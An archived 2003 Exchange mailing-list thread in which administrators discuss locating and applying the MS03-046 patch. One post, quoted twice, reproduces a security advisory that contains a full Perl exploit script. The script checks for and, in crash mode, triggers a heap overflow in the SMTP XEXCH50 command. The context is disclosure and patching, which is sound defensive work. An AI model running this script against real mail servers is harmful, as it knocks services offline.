RE: MS03-046 Patch
In my clients defense there is no easy access to 46 and 47 from here http://www.microsoft.com/security/security_bulletins/ which ya woulda thought wasa "Good Idea"(TM) >>> [EMAIL PROTECTED] 23/10/2003 7:05:28 a.m. >>> Teach a man to fish... Ben Winzenz Network Engineer Gardner & White (317) 581-1580 ext 418 -Original Message- From: Sabo, Eric [mailto:[EMAIL PROTECTED] Posted At: Wednesday, October 22, 2003 12:59 PM Posted To: Exchange (Swynk) Conversation: MS03-046 Patch Subject: RE: MS03-046 Patch http://www.microsoft.com/technet/treeview/default.asp?url=/technet/secur ity/bulletin/excoct03.asp -Original Message- From: Ben Winzenz [mailto:[EMAIL PROTECTED] Sent: Wednesday, October 22, 2003 1:44 PM To: Exchange Discussions Subject: RE: MS03-046 Patch How about a simple search on Technet for MS03-046? Worked for me. A Google search would probably pull it up as well. Ben Winzenz Network Engineer Gardner & White (317) 581-1580 ext 418 -Original Message- From: John Parker [mailto:[EMAIL PROTECTED] Posted At: Wednesday, October 22, 2003 11:42 AM Posted To: Exchange (Swynk) Conversation: MS03-046 Patch Subject: RE: MS03-046 Patch Where can we find the actual patch for this? John Parker, MCSE IS Admin. Senior Technical Specialist Digital Display Systems. Alpha Video _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&; lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&; lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&; lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] ** Northland State of the Environment Report 2002 now online at www.nrc.govt.nz ** NORTHLAND REGIONAL COUNCIL This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify [EMAIL PROTECTED] ** _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: MS03-046 Patch
47 only applies to 5.5 servers, not 2000. But you knew that already :-) Ben Winzenz Network Engineer Gardner & White (317) 581-1580 ext 418 -Original Message- From: Dean Cunningham [mailto:[EMAIL PROTECTED] Posted At: Wednesday, October 22, 2003 4:21 PM Posted To: Exchange (Swynk) Conversation: MS03-046 Patch Subject: RE: MS03-046 Patch Don't forget 47 while your at it >>> [EMAIL PROTECTED] 23/10/2003 6:43:40 a.m. >>> How about a simple search on Technet for MS03-046? Worked for me. A Google search would probably pull it up as well. Ben Winzenz Network Engineer Gardner & White (317) 581-1580 ext 418 -Original Message- From: John Parker [mailto:[EMAIL PROTECTED] Posted At: Wednesday, October 22, 2003 11:42 AM Posted To: Exchange (Swynk) Conversation: MS03-046 Patch Subject: RE: MS03-046 Patch Where can we find the actual patch for this? John Parker, MCSE IS Admin. Senior Technical Specialist Digital Display Systems. Alpha Video _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&; lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&; lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] ** Northland State of the Environment Report 2002 now online at www.nrc.govt.nz ** NORTHLAND REGIONAL COUNCIL This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify [EMAIL PROTECTED] ** _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&; lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: MS03-046 Patch
Don't forget 47 while your at it >>> [EMAIL PROTECTED] 23/10/2003 6:43:40 a.m. >>> How about a simple search on Technet for MS03-046? Worked for me. A Google search would probably pull it up as well. Ben Winzenz Network Engineer Gardner & White (317) 581-1580 ext 418 -Original Message- From: John Parker [mailto:[EMAIL PROTECTED] Posted At: Wednesday, October 22, 2003 11:42 AM Posted To: Exchange (Swynk) Conversation: MS03-046 Patch Subject: RE: MS03-046 Patch Where can we find the actual patch for this? John Parker, MCSE IS Admin. Senior Technical Specialist Digital Display Systems. Alpha Video _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&; lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] ** Northland State of the Environment Report 2002 now online at www.nrc.govt.nz ** NORTHLAND REGIONAL COUNCIL This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify [EMAIL PROTECTED] ** _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: MS03-046 Patch
Teach a man to fish... Ben Winzenz Network Engineer Gardner & White (317) 581-1580 ext 418 -Original Message- From: Sabo, Eric [mailto:[EMAIL PROTECTED] Posted At: Wednesday, October 22, 2003 12:59 PM Posted To: Exchange (Swynk) Conversation: MS03-046 Patch Subject: RE: MS03-046 Patch http://www.microsoft.com/technet/treeview/default.asp?url=/technet/secur ity/bulletin/excoct03.asp -Original Message- From: Ben Winzenz [mailto:[EMAIL PROTECTED] Sent: Wednesday, October 22, 2003 1:44 PM To: Exchange Discussions Subject: RE: MS03-046 Patch How about a simple search on Technet for MS03-046? Worked for me. A Google search would probably pull it up as well. Ben Winzenz Network Engineer Gardner & White (317) 581-1580 ext 418 -Original Message- From: John Parker [mailto:[EMAIL PROTECTED] Posted At: Wednesday, October 22, 2003 11:42 AM Posted To: Exchange (Swynk) Conversation: MS03-046 Patch Subject: RE: MS03-046 Patch Where can we find the actual patch for this? John Parker, MCSE IS Admin. Senior Technical Specialist Digital Display Systems. Alpha Video _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&; lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&; lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&; lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: MS03-046 Patch
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/secur ity/bulletin/excoct03.asp -Original Message- From: Ben Winzenz [mailto:[EMAIL PROTECTED] Sent: Wednesday, October 22, 2003 1:44 PM To: Exchange Discussions Subject: RE: MS03-046 Patch How about a simple search on Technet for MS03-046? Worked for me. A Google search would probably pull it up as well. Ben Winzenz Network Engineer Gardner & White (317) 581-1580 ext 418 -Original Message- From: John Parker [mailto:[EMAIL PROTECTED] Posted At: Wednesday, October 22, 2003 11:42 AM Posted To: Exchange (Swynk) Conversation: MS03-046 Patch Subject: RE: MS03-046 Patch Where can we find the actual patch for this? John Parker, MCSE IS Admin. Senior Technical Specialist Digital Display Systems. Alpha Video _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&; lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&; lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: MS03-046 Patch
How about a simple search on Technet for MS03-046? Worked for me. A Google search would probably pull it up as well. Ben Winzenz Network Engineer Gardner & White (317) 581-1580 ext 418 -Original Message- From: John Parker [mailto:[EMAIL PROTECTED] Posted At: Wednesday, October 22, 2003 11:42 AM Posted To: Exchange (Swynk) Conversation: MS03-046 Patch Subject: RE: MS03-046 Patch Where can we find the actual patch for this? John Parker, MCSE IS Admin. Senior Technical Specialist Digital Display Systems. Alpha Video _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&; lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: MS03-046 Patch
Where can we find the actual patch for this? John Parker, MCSE IS Admin. Senior Technical Specialist Digital Display Systems. Alpha Video _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: MS03-046 Patch
We have a Linux gateway in front of our Exchange box, however I still applied the patch just to be safe. No problems here. Exchange 5.5, Win2k SP4, single site, single server. Steven --- Steven Dickenson <[EMAIL PROTECTED]> Network Administrator The Key School, Annapolis Maryland -Original Message- From: Ben Winzenz [mailto:[EMAIL PROTECTED] Sent: Wednesday, October 22, 2003 12:25 PM To: Exchange Discussions Subject: RE: MS03-046 Patch When I read the write-up, it seems to only be a critical patch if your Exchange server is directly facing the internet, meaning port 25 of Exchange is what other servers connect to and deliver mail to. If you have something else in front of Exchange, such as a gateway, you are not vulnerable to this. Ben Winzenz Network Engineer Gardner & White (317) 581-1580 ext 418 -Original Message- From: Clemens, Rick [mailto:[EMAIL PROTECTED] Posted At: Wednesday, October 22, 2003 11:19 AM Posted To: Exchange (Swynk) Conversation: MS03-046 Patch Subject: MS03-046 Patch Are we seeing any issues with this patch? It seems the exploit code is available. Microsoft Exchange 2000 Heap Overflow (XEXCH50) As we reported in our previous article Vulnerability in Exchange Server Could Allow Arbitrary Code Execution (MS03-046), a vulnerability in the Exchange Server allows remote attackers to cause the Exchange Server to execute arbitrary code. The following exploit code can be used to test your server for the mentioned vulnerability (It causes a denial of service on vulnerable servers). Exploit: #!/usr/bin/perl -w ## ## # ms03-046.pl - hdm[at]metasploit.com ## use strict; use IO::Socket; my $host = shift() || usage(); my $mode = shift() || "CHECK"; my $port = 25; if (uc($mode) eq "CHECK") { check() } if (uc($mode) eq "CRASH") { crash() } usage(); sub check { my $s = SMTP($host, $port); if (! $s) { print "[*] Error establishing connection to SMTP service.\n"; exit(0); } print $s "XEXCH50 2 2\r\n"; my $res = <$s>; close ($s); # a patched server only allows XEXCH50 after NTLM authentication if ($res =~ /authentication/i) { print "[*] This server has been patched or is not vulnerable.\n"; exit(0); } print "[*] This system is vulnerable: $host:$port\n"; exit(0); } sub crash { my $s = SMTP($host, $port); if (! $s) { print "[*] Error establishing connection to SMTP service.\n"; exit(0); } # the negative value allows us to overwrite random heap bits print $s "XEXCH50 -1 2\r\n"; my $res = <$s>; # a patched server only allows XEXCH50 after NTLM authentication if ($res =~ /authentication/i) { print "[*] This server has been patched or is not vulnerable.\n"; exit(0); } print "[*] Sending massive heap-smashing string...\n"; print $s ("META" x 16384); # sometimes a second connection is required to trigger the crash $s = SMTP($host, $port); exit(0); } sub usage { print STDERR "Usage: $0 [CHECK|CRASH]\n"; exit(0); } sub SMTP { my ($host, $port) = @_; my $s = IO::Socket::INET->new ( PeerAddr => $host, PeerPort => $port, Proto => "tcp" ) || return(undef); my $r = <$s>; return undef if !$r; if ($r !~ /Microsoft/) { chomp($r); print STDERR "[*] This does not look like an exchange server: $r\n"; return(undef); } print $s "HELO X\r\n"; $r = <$s>; return undef if !$r; print $s "MAIL FROM: DoS\r\n"; $r = <$s>; return undef if !$r; print $s "RCPT TO: Administrator\r\n"; $r = <$s>; return undef if !$r; return($s); } Additional Information: The information has been provided by H D Moore. This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [EMAIL PROTECTED] In order to subscribe to the mailing list and receive advisories in HTML format, simply forward this email to: [EMAIL PROTECTED] DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special dama
RE: MS03-046 Patch
When I read the write-up, it seems to only be a critical patch if your Exchange server is directly facing the internet, meaning port 25 of Exchange is what other servers connect to and deliver mail to. If you have something else in front of Exchange, such as a gateway, you are not vulnerable to this. Ben Winzenz Network Engineer Gardner & White (317) 581-1580 ext 418 -Original Message- From: Clemens, Rick [mailto:[EMAIL PROTECTED] Posted At: Wednesday, October 22, 2003 11:19 AM Posted To: Exchange (Swynk) Conversation: MS03-046 Patch Subject: MS03-046 Patch Are we seeing any issues with this patch? It seems the exploit code is available. Microsoft Exchange 2000 Heap Overflow (XEXCH50) As we reported in our previous article Vulnerability in Exchange Server Could Allow Arbitrary Code Execution (MS03-046), a vulnerability in the Exchange Server allows remote attackers to cause the Exchange Server to execute arbitrary code. The following exploit code can be used to test your server for the mentioned vulnerability (It causes a denial of service on vulnerable servers). Exploit: #!/usr/bin/perl -w ## ## # ms03-046.pl - hdm[at]metasploit.com ## use strict; use IO::Socket; my $host = shift() || usage(); my $mode = shift() || "CHECK"; my $port = 25; if (uc($mode) eq "CHECK") { check() } if (uc($mode) eq "CRASH") { crash() } usage(); sub check { my $s = SMTP($host, $port); if (! $s) { print "[*] Error establishing connection to SMTP service.\n"; exit(0); } print $s "XEXCH50 2 2\r\n"; my $res = <$s>; close ($s); # a patched server only allows XEXCH50 after NTLM authentication if ($res =~ /authentication/i) { print "[*] This server has been patched or is not vulnerable.\n"; exit(0); } print "[*] This system is vulnerable: $host:$port\n"; exit(0); } sub crash { my $s = SMTP($host, $port); if (! $s) { print "[*] Error establishing connection to SMTP service.\n"; exit(0); } # the negative value allows us to overwrite random heap bits print $s "XEXCH50 -1 2\r\n"; my $res = <$s>; # a patched server only allows XEXCH50 after NTLM authentication if ($res =~ /authentication/i) { print "[*] This server has been patched or is not vulnerable.\n"; exit(0); } print "[*] Sending massive heap-smashing string...\n"; print $s ("META" x 16384); # sometimes a second connection is required to trigger the crash $s = SMTP($host, $port); exit(0); } sub usage { print STDERR "Usage: $0 [CHECK|CRASH]\n"; exit(0); } sub SMTP { my ($host, $port) = @_; my $s = IO::Socket::INET->new ( PeerAddr => $host, PeerPort => $port, Proto => "tcp" ) || return(undef); my $r = <$s>; return undef if !$r; if ($r !~ /Microsoft/) { chomp($r); print STDERR "[*] This does not look like an exchange server: $r\n"; return(undef); } print $s "HELO X\r\n"; $r = <$s>; return undef if !$r; print $s "MAIL FROM: DoS\r\n"; $r = <$s>; return undef if !$r; print $s "RCPT TO: Administrator\r\n"; $r = <$s>; return undef if !$r; return($s); } Additional Information: The information has been provided by H D Moore. This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [EMAIL PROTECTED] In order to subscribe to the mailing list and receive advisories in HTML format, simply forward this email to: [EMAIL PROTECTED] DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&; lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Web Interface: http://intm-dl.sparklist.com/cgi-bin/lyris.pl?enter=exchange&text_mode=&lang=english To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]